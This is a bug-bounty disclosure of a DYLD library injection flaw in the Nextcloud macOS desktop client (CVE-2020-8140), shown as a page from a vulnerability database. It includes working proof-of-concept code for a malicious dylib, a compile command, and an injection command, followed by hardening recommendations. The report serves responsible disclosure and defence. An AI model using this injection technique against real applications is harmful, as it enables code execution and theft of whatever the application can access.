Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneR3ggi-on-h1H1:633266
HistoryJul 01, 2019 - 5:16 p.m.

Nextcloud: Code injection in macOS Desktop Client

2019-07-0117:16:28
r3ggi-on-h1
hackerone.com
74

EPSS

0.001

Percentile

20.2%

JSON

Vulnerability description

I’ve identified a code injection vulnerability in your macOS desktop client. Any malicious application, running with standard user permissions is able to exploit this vulnerability and execute code in your application’s context.

Requirements

In order to exploit this vulnerability, a victim has to have a malicious application installed on the device.

Proof of Concept

To show you the impact I’ve prepared a proof of concept where malicious application without root permissions is able to inject to Nextcloud process and open the calculator.

1. At first, create a malicious dylib (malicious.m) with following contents:

#include <Foundation/Foundation.h>

__attribute__((constructor)) static void pwn() {
    
   puts("\n\nHELLO FROM THE DYLIB!\n\n");
    
   NSTask *task = [[NSTask alloc] init];
   task.launchPath = @"/Applications/Calculator.app/Contents/MacOS/Calculator";
   [task launch];
    
}

2. Compile it using gcc

gcc -dynamiclib -undefined suppress -flat_namespace malicious.m -o malicious.dylib -compatibility_version 10.10.10 -lobjc -framework Foundation

3. Inject the library using DYLD environment variable. (This is the easiest way to reproduce the vulnerability)

DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/nextcloud.app/Contents/MacOS/nextcloud

4. Calculator should be opened as shown on attached screenshot

Recommendations

Assuming that the desktop client has been compiled using XCode, a developer needs to turn on “Hardened Runtime” capability making sure that Allow DYLD Environment Variables option is turned off. Another way to disallow the DYLD Environement variables is adding a _RESTRICTED segment to the application binary.

References

Privilege escalation in Keybase using this technique
https://hackerone.com/reports/470003

Apple Docs - Hardened runtime entitlements
https://developer.apple.com/documentation/security/hardened_runtime_entitlements

Important notes

  • Physical access is not required to exploit this vulnerability.
  • Applications do not need root permission to open other applications with DYLD_INSERT_LIBRARIES enviornment variable - execve documentation.

Impact

Code execution in the application’s context. Any sensitive resource that may be accessed via the application may be stolen. Attacker is also able to perform any action that user may perform from the app.

Related

debiancve 1
ubuntucve 1
cvelist 1
prion 1
nextcloud 1
osv 1
nvd 1
cve 1
debiancve
debiancve
CVE-2020-8140
2020-03-20 21:15:17
ubuntucve
ubuntucve
CVE-2020-8140
2020-03-20 00:00:00
cvelist
cvelist
CVE-2020-8140
2020-03-20 20:20:14
prion
prion
Code injection
2020-03-20 21:15:00
nextcloud
nextcloud
Code injection in Nextcloud Desktop Client for macOS (NC-SA-2020-016)
2020-02-17 00:00:00
osv
osv
CVE-2020-8140
2020-03-20 21:15:17
nvd
nvd
CVE-2020-8140
2020-03-20 21:15:17
cve
cve
CVE-2020-8140
2020-03-20 21:15:17

EPSS

0.001

Percentile

20.2%

JSON
Related for H1:633266
debiancve1ubuntucve1cvelist1prion1nextcloud1osv1nvd1cve1